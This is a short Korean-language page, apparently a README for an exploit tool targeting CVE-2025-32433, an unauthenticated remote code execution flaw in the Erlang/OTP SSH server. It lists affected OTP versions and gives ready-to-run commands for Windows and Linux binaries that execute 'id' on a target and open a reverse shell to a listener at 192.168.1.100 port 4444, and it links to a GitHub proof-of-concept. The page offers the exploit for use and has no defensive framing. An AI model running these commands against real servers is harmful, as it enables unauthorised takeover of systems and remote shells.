
CVE-2025-32433 Erlang/OTP SSH RCE 익스플로잇 SSH 원격 코드 실행 취약점 익스플로잇
Erlang/OTP SSH 서버에서 심각한 취약점이 발견되었습니다. 이 취약점을 통해 공격자는 인증 없이 원격 코드 실행(RCE)을 수행할 수 있습니다. SSH 프로토콜 메시지 처리의 결함을 악용하여 악의적인 공격자는 유효한 자격 증명 없이 영향을 받는 시스템에 무단으로 접근하고 임의의 명령을 실행할 수 있습니다. 이는 해당 호스트의 손상으로 이어져 제3자가 민감한 데이터에 무단으로 접근하고 조작할 수 있게 하거나, 서비스 거부 공격을 가능하게 할 수 있습니다.
OTP-27.3.2 및 이전 버전
OTP-26.2.5.10 및 이전 버전
OTP-25.3.2.19 및 이전 버전
cve-2025-32433.exe 127.0.0.1 -c 'id'
./cve-2025-32433.lnx 127.0.0.1 -c 'id'
cve-2025-32433.exe 127.0.0.1 --shell --lhost 192.168.1.100 --lport 4444
./cve-2025-32433.lnx 127.0.0.1 --shell --lhost 192.168.1.100 --lport 4444

https://github.com/omer-efe-curkus/CVE-2025-32433-Erlang-OTP-SSH-RCE-PoC